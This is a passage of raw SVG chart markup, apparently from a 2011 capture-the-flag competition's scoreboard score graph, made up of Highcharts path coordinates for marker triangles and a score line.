234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 92.5 242.32 L 88.5 234.32 96.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 91 242.32 L 87 234.32 95 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 89.5 242.32 L 85.5 234.32 93.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 88 242.32 L 84 234.32 92 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 86.5 242.32 L 82.5 234.32 90.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 85 242.32 L 81 234.32 89 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 83.5 242.32 L 79.5 234.32 87.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 82 242.32 L 78 234.32 86 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 80.5 242.32 L 76.5 234.32 84.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 79 242.32 L 75 234.32 83 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 77.5 242.32 L 73.5 234.32 81.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 75.5 242.32 L 71.5 234.32 79.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 74 242.32 L 70 234.32 78 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 72.5 242.32 L 68.5 234.32 76.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 71 242.32 L 67 234.32 75 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 69.5 242.32 L 65.5 234.32 73.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 68 242.32 L 64 234.32 72 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 66.5 242.32 L 62.5 234.32 70.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 65 242.32 L 61 234.32 69 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 63.5 242.32 L 59.5 234.32 67.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 62 242.32 L 58 234.32 66 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 60.5 242.32 L 56.5 234.32 64.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 59 242.32 L 55 234.32 63 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 57.5 242.32 L 53.5 234.32 61.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 56 242.32 L 52 234.32 60 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 54.5 242.32 L 50.5 234.32 58.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 53 242.32 L 49 234.32 57 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 51.5 242.32 L 47.5 234.32 55.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 50 242.32 L 46 234.32 54 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 48 242.32 L 44 234.32 52 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 46.5 242.32 L 42.5 234.32 50.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 45 242.32 L 41 234.32 49 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 43.5 242.32 L 39.5 234.32 47.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 42 242.32 L 38 234.32 46 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 40.5 242.32 L 36.5 234.32 44.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 39 242.32 L 35 234.32 43 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 37.5 242.32 L 33.5 234.32 41.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 36 242.32 L 32 234.32 40 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 34.5 242.32 L 30.5 234.32 38.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 33 242.32 L 29 234.32 37 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 31.5 242.32 L 27.5 234.32 35.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 30 242.32 L 26 234.32 34 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 28.5 242.32 L 24.5 234.32 32.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 27 242.32 L 23 234.32 31 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 25.5 242.32 L 21.5 234.32 29.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 24 242.32 L 20 234.32 28 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 22 242.32 L 18 234.32 26 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 20.5 242.32 L 16.5 234.32 24.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 19 242.32 L 15 234.32 23 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 17.5 242.32 L 13.5 234.32 21.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 16 242.32 L 12 234.32 20 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 14.5 242.32 L 10.5 234.32 18.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 13 242.32 L 9 234.32 17 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 11.5 242.32 L 7.5 234.32 15.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 10 242.32 L 6 234.32 14 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 8.5 242.32 L 4.5 234.32 12.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 7 242.32 L 3 234.32 11 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 5.5 242.32 L 1.5 234.32 9.5 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 4 242.32 L 0 234.32 8 234.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path></g><g class="highcharts-series" clip-path="url(http://scoreboard.ictf2011.info/score-graph.html#highcharts-1580)" visibility="visible" transform="translate(75,55)"><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.8 L 118.51424632352942 236.8 L 120.04227941176471 236.8 L 121.5703125 236.8 L 123.0983455882353 236.8 L 124.6263786764706 236.8 L 126.15441176470588 236.8 L 127.68244485294119 236.8 L 129.21047794117646 236.8 L 130.73851102941177 236.8 L 132.26654411764707 236.8 L 133.79457720588235 236.8 L 135.32261029411765 236.8 L 136.85064338235296 236.8 L 138.37867647058823 236.8 L 139.90670955882354 236.8 L 141.43474264705884 236.8 L 142.96277573529412 236.8 L 144.49080882352942 236.8 L 146.01884191176472 236.8 L 147.546875 236.8 L 149.0749080882353 236.8 L 150.6029411764706 236.8 L 152.13097426470588 236.8 L 153.6590073529412 236.8 L 155.18704044117646 236.8 L 156.71507352941177 236.8 L 158.24310661764707 236.8 L 159.77113970588235 236.8 L 161.29917279411765 236.8 L 162.82720588235296 236.8 L 164.35523897058823 236.8 L 165.88327205882354 236.8 L 167.41130514705884 236.8 L 168.93933823529412 236.8 L 170.46737132352942 236.8 L 171.99540441176472 236.1453664 L 173.5234375 236.1453664 L 175.0514705882353 235.4907328 L 176.5795036764706 235.1667904 L 178.10753676470588 233.5639504 L 179.6355698529412 233.5639504 L 181.1636029411765 233.5639504 L 182.69163602941177 233.5639504 L 184.21966911764707 233.5639504 L 185.74770220588235 233.5639504 L 187.27573529411765 233.38810666666663 L 188.80376838235296 233.38810666666663 L 190.33180147058823 233.38810666666663 L 191.85983455882354 233.15178815999988 L 193.38786764705884 232.9347609599999 L 194.91590073529412 231.64236575999988 L 196.44393382352942 230.31214175999986 L 197.97196691176472 229.48097375999987 L 199.5 227.44621055999988 L 201.0280330882353 225.4114473599999 L 202.5560661764706 223.03249535999987 L 204.08409926470588 222.02053055999988 L 205.6121323529412 220.98556655999988 L 207.1401654411765 219.45739749333126 L 208.66819852941177 217.82756229333123 L 210.19623161764707 215.85691269333122 L 211.72426470588235 215.85691269333122 L 213.25229779411765 215.85691269333122 L 214.78033088235296 215.48167941333122 L 216.30836397058823 215.09834757333124 L 217.83639705882354 214.33978245333122 L 219.36443014705884 213.59741445333123 L 220.89246323529412 212.84424837333123 L 222.42049632352942 212.60804037333125 L 223.94852941176472 211.58762181333122 L 225.4765625 211.20698949333124 L 227.0045955882353 210.18927045333123 L 228.5326286764706 209.80458885333124 L 230.06066176470588 209.30258469333126 L 231.5886948529412 207.74766117333124 L 233.1167279411765 206.15874501333124 L 234.64476102941177 205.34854802133123 L 236.17279411764707 205.16735813333145 L 237.70082720588238 205.02964472533148 L 239.22886029411765 204.46477016533146 L 240.75689338235296 203.8998956053315 L 242.28492647058823 203.47049432533146 L 243.81295955882354 203.06354168533147 L 245.34099264705884 202.56008120533147 L 246.86902573529412 202.08968984533146 L 248.39705882352942 201.73470296533148 L 249.92509191176472 201.50051960533148 L 251.453125 201.45725624533148 L 252.9811580882353 201.45725624533148 L 254.5091911764706 201.3452261653315 L 256.0372242647059 201.12926456533148 L 257.56525735294116 200.84918936533148 L 259.09329044117646 200.8280549653315 L 260.62132352941177 200.7895654933315 L 262.1493566176471 200.65630155733135 L 263.6773897058824 200.5634877973314 L 265.2054227941177 200.49081387733136 L 266.7334558823529 200.43003521066487 L 268.26148897058823 200.334869631998 L 269.78952205882354 200.221045791998 L 271.31755514705884 200.15947779199809 L 272.84558823529414 200.0627789333315 L 274.37362132352945 200.0275880853315 L 275.9016544117647 199.69264632533148 L 277.4296875 199.69264632533148 L 278.9577205882353 199.69264632533148 L 280.4857536764706 199.69264632533148 L 282.0137867647059 199.69264632533148 L 283.54181985294116 199.69264632533148 L 285.06985294117646 199.69264632533148 L 286.59788602941177 199.23710232533148 L 288.1259191176471 198.90978552533147 L 289.6539522058824 198.32938872533148 L 291.1819852941177 197.33912664533148 L 292.7100183823529 196.51810670933148 L 294.23805147058823 195.7426695893315 L 295.76608455882354 195.0981947093315 L 297.29411764705884 194.61054418133148 L 298.82215073529414 194.61054418133148 L 300.35018382352945 194.61054418133148 L 301.8782169117647 193.84808685866474 L 303.40625 192.72757254399812 L 304.9342830882353 192.31298310399814 L 306.4623161764706 191.8666375999981 L 307.9903492647059 191.21557889066452 L 309.51838235294116 191.03535317333126 L 311.04641544117646 189.70392149333125 L 312.57444852941177 188.68379301333124 L 314.1024816176471 186.29896600533124 L 315.6305147058824 184.60151848533127 L 317.1585477941177 182.09085832533128 L 318.6865808823529 181.34885973333127 L 320.21461397058823 180.45261909333124 L 321.74264705882354 179.64233685333124 L 323.27068014705884 178.83504539733127 L 324.79871323529414 177.7485312213309 L 326.32674632352945 176.9558846613309 L 327.8547794117647 175.6883428053309 L 329.3828125 174.62338216533092 L 330.9108455882353 173.07061352533088 L 332.4388786764706 171.78743221333093 L 333.9669117647059 170.78767997866427 L 335.4949448529412 170.0141396266643 L 337.02297794117646 168.63997738666427 L 338.55101102941177 167.44122079999752 L 340.0790441176471 166.65374003199753 L 341.6070772058824 165.75410723199752 L 343.1351102941177 165.33170339199754 L 344.6631433823529 165.33170339199754 L 346.19117647058823 165.04306787199752 L 347.71920955882354 164.73825299199754 L 349.24724264705884 164.00272614399753 L 350.77527573529414 163.79688774399753 L 352.30330882352945 163.79688774399753 L 353.8313419117647 163.79688774399753 L 355.359375 163.79688774399753 L 356.8874080882353 163.79688774399753 L 358.4154411764706 163.79688774399753 L 359.9434742647059 163.60221446399754 L 361.4715073529412 163.4567087573309 L 362.99954044117646 163.15658527999756 L 364.52757352941177 162.63092835199754 L 366.0556066176471 162.32943459199757 L 367.5836397058824 161.78606462933092 L 369.1116727941177 161.39250302933095 L 370.6397058823529 161.15966942933093 L 372.16773897058823 160.19757470933092 L 373.69577205882354 159.8962123733309 L 375.22380514705884 158.22240893866427 L 376.75183823529414 157.09466748799753 L 378.27987132352945 154.47904572799757 L 379.8079044117647 152.48935740799755 L 381.3359375 151.99776771199765 L 382.8639705882353 151.69312569599768 L 384.3920036764706 150.12692102399765 L 385.9200367647059 149.11445933866432 L 387.4480698529412 146.52967683199768 L 388.97610294117646 144.51849891199765 L 390.50413602941177 139.53462259199765 L 392.0321691176471 138.15426803199648 L 393.5602022058824 138.03481427199645 L 395.0882352941177 137.81540012799647" fill="none" stroke="rgb(0, 0, 0)" stroke-width="5" isShadow="true" stroke-opacity="0.05" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.8 L 118.51424632352942 236.8 L 120.04227941176471 236.8 L 121.5703125 236.8 L 123.0983455882353 236.8 L 124.6263786764706 236.8 L 126.15441176470588 236.8 L 127.68244485294119 236.8 L 129.21047794117646 236.8 L 130.73851102941177 236.8 L 132.26654411764707 236.8 L 133.79457720588235 236.8 L 135.32261029411765 236.8 L 136.85064338235296 236.8 L 138.37867647058823 236.8 L 139.90670955882354 236.8 L 141.43474264705884 236.8 L 142.96277573529412 236.8 L 144.49080882352942 236.8 L 146.01884191176472 236.8 L 147.546875 236.8 L 149.0749080882353 236.8 L 150.6029411764706 236.8 L 152.13097426470588 236.8 L 153.6590073529412 236.8 L 155.18704044117646 236.8 L 156.71507352941177 236.8 L 158.24310661764707 236.8 L 159.77113970588235 236.8 L 161.29917279411765 236.8 L 162.82720588235296 236.8 L 164.35523897058823 236.8 L 165.88327205882354 236.8 L 167.41130514705884 236.8 L 168.93933823529412 236.8 L 170.46737132352942 236.8 L 171.99540441176472 236.1453664 L 173.5234375 236.1453664 L 175.0514705882353 235.4907328 L 176.5795036764706 235.1667904 L 178.10753676470588 233.5639504 L 179.6355698529412 233.5639504 L 181.1636029411765 233.5639504 L 182.69163602941177 233.5639504 L 184.21966911764707 233.5639504 L 185.74770220588235 233.5639504 L 187.27573529411765 233.38810666666663 L 188.80376838235296 233.38810666666663 L 190.33180147058823 233.38810666666663 L 191.85983455882354 233.15178815999988 L 193.38786764705884 232.9347609599999 L 194.91590073529412 231.64236575999988 L 196.44393382352942 230.31214175999986 L 197.97196691176472 229.48097375999987 L 199.5 227.44621055999988 L 201.0280330882353 225.4114473599999 L 202.5560661764706 223.03249535999987 L 204.08409926470588 222.02053055999988 L 205.6121323529412 220.98556655999988 L 207.1401654411765 219.45739749333126 L 208.66819852941177 217.82756229333123 L 210.19623161764707 215.85691269333122 L 211.72426470588235 215.85691269333122 L 213.25229779411765 215.85691269333122 L 214.78033088235296 215.48167941333122 L 216.30836397058823 215.09834757333124 L 217.83639705882354 214.33978245333122 L 219.36443014705884 213.59741445333123 L 220.89246323529412 212.84424837333123 L 222.42049632352942 212.60804037333125 L 223.94852941176472 211.58762181333122 L 225.4765625 211.20698949333124 L 227.0045955882353 210.18927045333123 L 228.5326286764706 209.80458885333124 L 230.06066176470588 209.30258469333126 L 231.5886948529412 207.74766117333124 L 233.1167279411765 206.15874501333124 L 234.64476102941177 205.34854802133123 L 236.17279411764707 205.16735813333145 L 237.70082720588238 205.02964472533148 L 239.22886029411765 204.46477016533146 L 240.75689338235296 203.8998956053315 L 242.28492647058823 203.47049432533146 L 243.81295955882354 203.06354168533147 L 245.34099264705884 202.56008120533147 L 246.86902573529412 202.08968984533146 L 248.39705882352942 201.73470296533148 L 249.92509191176472 201.50051960533148 L 251.453125 201.45725624533148 L 252.9811580882353 201.45725624533148 L 254.5091911764706 201.3452261653315 L 256.0372242647059 201.12926456533148 L 257.56525735294116 200.84918936533148 L 259.09329044117646 200.8280549653315 L 260.62132352941177 200.7895654933315 L 262.1493566176471 200.65630155733135 L 263.6773897058824 200.5634877973314 L 265.2054227941177 200.49081387733136 L 266.7334558823529 200.43003521066487 L 268.26148897058823 200.334869631998 L 269.78952205882354 200.221045791998 L 271.31755514705884 200.15947779199809 L 272.84558823529414 200.0627789333315 L 274.37362132352945 200.0275880853315 L 275.9016544117647 199.69264632533148 L 277.4296875 199.69264632533148 L 278.9577205882353 199.69264632533148 L 280.4857536764706 199.69264632533148 L 282.0137867647059 199.69264632533148 L 283.54181985294116 199.69264632533148 L 285.06985294117646 199.69264632533148 L 286.59788602941177 199.23710232533148 L 288.1259191176471 198.90978552533147 L 289.6539522058824 198.32938872533148 L 291.1819852941177 197.33912664533148 L 292.7100183823529 196.51810670933148 L 294.23805147058823 195.7426695893315 L 295.76608455882354 195.0981947093315 L 297.29411764705884 194.61054418133148 L 298.82215073529414 194.61054418133148 L 300.35018382352945 194.61054418133148 L 301.8782169117647 193.84808685866474 L 303.40625 192.72757254399812 L 304.9342830882353 192.31298310399814 L 306.4623161764706 191.8666375999981 L 307.9903492647059 191.21557889066452 L 309.51838235294116 191.03535317333126 L 311.04641544117646 189.70392149333125 L 312.57444852941177 188.68379301333124 L 314.1024816176471 186.29896600533124 L 315.6305147058824 184.60151848533127 L 317.1585477941177 182.09085832533128 L 318.6865808823529 181.34885973333127 L 320.21461397058823 180.45261909333124 L 321.74264705882354 179.64233685333124 L 323.27068014705884 178.83504539733127 L 324.79871323529414 177.7485312213309 L 326.32674632352945 176.9558846613309 L 327.8547794117647 175.6883428053309 L 329.3828125 174.62338216533092 L 330.9108455882353 173.07061352533088 L 332.4388786764706 171.78743221333093 L 333.9669117647059 170.78767997866427 L 335.4949448529412 170.0141396266643 L 337.02297794117646 168.63997738666427 L 338.55101102941177 167.44122079999752 L 340.0790441176471 166.65374003199753 L 341.6070772058824 165.75410723199752 L 343.1351102941177 165.33170339199754 L 344.6631433823529 165.33170339199754 L 346.19117647058823 165.04306787199752 L 347.71920955882354 164.73825299199754 L 349.24724264705884 164.00272614399753 L 350.77527573529414 163.79688774399753 L 352.30330882352945 163.79688774399753 L 353.8313419117647 163.79688774399753 L 355.359375 163.79688774399753 L 356.8874080882353 163.79688774399753 L 358.4154411764706 163.79688774399753 L 359.9434742647059 163.60221446399754 L 361.4715073529412 163.4567087573309 L 362.99954044117646 163.15658527999756 L 364.52757352941177 162.63092835199754 L 366.0556066176471 162.32943459199757 L 367.5836397058824 161.78606462933092 L 369.1116727941177 161.39250302933095 L 370.6397058823529 161.15966942933093 L 372.16773897058823 160.19757470933092 L 373.69577205882354 159.8962123733309 L 375.22380514705884 158.22240893866427 L 376.75183823529414 157.09466748799753 L 378.27987132352945 154.47904572799757 L 379.8079044117647 152.48935740799755 L 381.3359375 151.99776771199765 L 382.8639705882353 151.69312569599768 L 384.3920036764706 150.12692102399765 L 385.9200367647059 149.11445933866432 L 387.4480698529412 146.52967683199768 L 388.97610294117646 144.51849891199765 L 390.50413602941177 139.53462259199765 L 392.0321691176471 138.15426803199648 L 393.5602022058824 138.03481427199645 L 395.0882352941177 137.81540012799647" fill="none" stroke="rgb(0, 0, 0)" stroke-width="3" isShadow="true" stroke-opacity="0.1" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.8 L 118.51424632352942 236.8 L 120.04227941176471 236.8 L 121.5703125 236.8 L 123.0983455882353 236.8 L 124.6263786764706 236.8 L 126.15441176470588 236.8 L 127.68244485294119 236.8 L 129.21047794117646 236.8 L 130.73851102941177 236.8 L 132.26654411764707 236.8 L 133.79457720588235 236.8 L 135.32261029411765 236.8 L 136.85064338235296 236.8 L 138.37867647058823 236.8 L 139.90670955882354 236.8 L 141.43474264705884 236.8 L 142.96277573529412 236.8 L 144.49080882352942 236.8 L 146.01884191176472 236.8 L 147.546875 236.8 L 149.0749080882353 236.8 L 150.6029411764706 236.8 L 152.13097426470588 236.8 L 153.6590073529412 236.8 L 155.18704044117646 236.8 L 156.71507352941177 236.8 L 158.24310661764707 236.8 L 159.77113970588235 236.8 L 161.29917279411765 236.8 L 162.82720588235296 236.8 L 164.35523897058823 236.8 L 165.88327205882354 236.8 L 167.41130514705884 236.8 L 168.93933823529412 236.8 L 170.46737132352942 236.8 L 171.99540441176472 236.1453664 L 173.5234375 236.1453664 L 175.0514705882353 235.4907328 L 176.5795036764706 235.1667904 L 178.10753676470588 233.5639504 L 179.6355698529412 233.5639504 L 181.1636029411765 233.5639504 L 182.69163602941177 233.5639504 L 184.21966911764707 233.5639504 L 185.74770220588235 233.5639504 L 187.27573529411765 233.38810666666663 L 188.80376838235296 233.38810666666663 L 190.33180147058823 233.38810666666663 L 191.85983455882354 233.15178815999988 L 193.38786764705884 232.9347609599999 L 194.91590073529412 231.64236575999988 L 196.44393382352942 230.31214175999986 L 197.97196691176472 229.48097375999987 L 199.5 227.44621055999988 L 201.0280330882353 225.4114473599999 L 202.5560661764706 223.03249535999987 L 204.08409926470588 222.02053055999988 L 205.6121323529412 220.98556655999988 L 207.1401654411765 219.45739749333126 L 208.66819852941177 217.82756229333123 L 210.19623161764707 215.85691269333122 L 211.72426470588235 215.85691269333122 L 213.25229779411765 215.85691269333122 L 214.78033088235296 215.48167941333122 L 216.30836397058823 215.09834757333124 L 217.83639705882354 214.33978245333122 L 219.36443014705884 213.59741445333123 L 220.89246323529412 212.84424837333123 L 222.42049632352942 212.60804037333125 L 223.94852941176472 211.58762181333122 L 225.4765625 211.20698949333124 L 227.0045955882353 210.18927045333123 L 228.5326286764706 209.80458885333124 L 230.06066176470588 209.30258469333126 L 231.5886948529412 207.74766117333124 L 233.1167279411765 206.15874501333124 L 234.64476102941177 205.34854802133123 L 236.17279411764707 205.16735813333145 L 237.70082720588238 205.02964472533148 L 239.22886029411765 204.46477016533146 L 240.75689338235296 203.8998956053315 L 242.28492647058823 203.47049432533146 L 243.81295955882354 203.06354168533147 L 245.34099264705884 202.56008120533147 L 246.86902573529412 202.08968984533146 L 248.39705882352942 201.73470296533148 L 249.92509191176472 201.50051960533148 L 251.453125 201.45725624533148 L 252.9811580882353 201.45725624533148 L 254.5091911764706 201.3452261653315 L 256.0372242647059 201.12926456533148 L 257.56525735294116 200.84918936533148 L 259.09329044117646 200.8280549653315 L 260.62132352941177 200.7895654933315 L 262.1493566176471 200.65630155733135 L 263.6773897058824 200.5634877973314 L 265.2054227941177 200.49081387733136 L 266.7334558823529 200.43003521066487 L 268.26148897058823 200.334869631998 L 269.78952205882354 200.221045791998 L 271.31755514705884 200.15947779199809 L 272.84558823529414 200.0627789333315 L 274.37362132352945 200.0275880853315 L 275.9016544117647 199.69264632533148 L 277.4296875 199.69264632533148 L 278.9577205882353 199.69264632533148 L 280.4857536764706 199.69264632533148 L 282.0137867647059 199.69264632533148 L 283.54181985294116 199.69264632533148 L 285.06985294117646 199.69264632533148 L 